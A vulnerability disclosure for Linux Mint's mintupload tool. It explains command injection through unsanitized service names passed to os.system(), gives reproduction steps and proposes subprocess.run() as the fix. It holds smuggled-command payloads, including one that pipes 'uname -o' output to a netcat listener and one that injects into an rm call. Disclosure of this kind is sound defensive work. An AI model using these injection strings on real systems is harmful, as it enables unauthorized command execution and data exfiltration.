Vulnerability: Improper sanitation of service name leads to command injection in check_connection(), drop_data_received_cb() and Service.remove()

[1337kid]

Overview

    def check_connection(self, widget, file):
        service = Service(file)
        os.system("mintupload \"" + service['name'] + "\" /usr/share/linuxmint/mintupload/mintupload.readme &")

Here, the service name is added without sanitizing it. By default mintupload doesn't allow a user to create a service with special characters but it's possible to modify the service name by changing it in ~/.linuxmint/mintUpload/services/service.

Consider a case where the service name starts with " and ends with #. By doing so, the argument in os.system becomes

mintupload "" servicename #" /usr/share/linuxmint/mintupload/mintupload.readme &

Now, to inject a command replace servicename with & command here.

Example:

To display the output of uname -o via a netcat listener, change the service name to " & uname -o | nc 0.0.0.0 1234 #

Steps to reproduce

• Create a service.
• Modify the service name in ~/.linuxmint/mintUpload/services/service to " & command here #.
• Open Mint Upload. Select the service and click on "Check connection".

Other functions

When the function drop_data_received_cb() is invoked by dropping a file, the command gets executed.

    def remove(self):
        os.system("rm '" + self.filename + "'")

In the case of Service.remove(). A command can by injected by renaming the service file to ' & command here #, so that the argument inside os.system() will become

rm '' & command here #

Possible fix

Replacing os.system() with subprocess.run() can fix this issue.